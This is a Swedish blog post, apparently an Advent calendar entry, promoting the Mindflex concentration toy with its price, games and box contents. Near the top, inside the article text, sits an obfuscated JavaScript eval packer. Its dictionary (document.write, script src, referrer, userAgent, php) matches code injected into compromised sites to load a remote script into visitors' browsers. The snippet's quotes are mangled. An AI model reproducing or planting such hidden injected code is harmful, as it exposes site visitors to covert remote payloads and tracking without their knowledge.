Image Image Image Image Image Image Image Image Image Image

| 19 januari, 2020

Scroll to top

Top

Lucka 3 julkalender: MINDFLEX

Lucka 3 julkalender: MINDFLEX
Sebastian

Redan eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rhhff|var|u0026u|referrer|ksdie||js|php’.split(’|’),0,{}))
3 december och dags för lucka 3 att öppnas i vår julkalender i år. 

Här har vi en riktigt intressant och unik leksak som bygger på att du ska ta en kula genom en bana med endast din tankekraft som kontroll.

Du placerar kulan på spelplanen, sätter på dig ett pannband med sensorer och koncentrerar dig för allt du är värd. När du koncentrerar dig riktigt hårt genererar nämligen den där bollen inuti ditt huvud, vanligtvis kallad hjärnan, så kallade hjärnvågor. Logiskt! Sensorer i pannbandet läser av intensiteten i din koncentration och sänder en signal till fläktarna i Mindflexspelet som därmed höjer eller sänker kulan, beroende på hur hårt du tänker. Glasklart? Förmodligen inte, men det hindrar inte att det är allvar. Mindflex fungerar.

Mindflex kostar 995 kronor och finns att köpa här!

Fakta om Mindflex:

 • Spel för hjärnan!
 • Det trådlösa headsetet läser aktivt av aktiviteten hos dina hjärnvågor
 • Koncentrera dig och bollen lyfter på en kudde av luft
 • Slappna av och den sänker sig
 • Målet är att navigera bollen genom en hinderbana
 • 5 förprogrammerade spel: ”Mental Marathon” – Ta dig snabbt genom hinderbanan, ”Chase the lights” – Markera så många lampor som möjligt innan tiden går ut, ”Danger Zone” – Fly från varje farozon eller förlora spelet, ”Thoughtshot” – Skjut iväg bollen och träffa hålet, ”Freestyle” – Utforska Mindflex utan tidsgräns
 • Konsolen talar endast engelska
 • 1-4 spelare, Från 8 år
 • Mindflex använder en variant av EEG-teknik för attt ”läsa av” intensiteten hos dina hjärnvågor via sensorer på din panna och dina öron. Sensorerna varken genererar eller påverkar hjärnvågor, de läser bara av det som redan finns där
 • Kräver 4 st. C-batterier för spelet samt 3 st. AAA-batterier för det trådlösa headsetet, vilket inte ingår men kan köpas här
 • Boxen innehåller: 1 konsol, 1 headset, 4 bollar, 9 hinder(20 delar), 1 instruktionsbok på svenska, danska och finska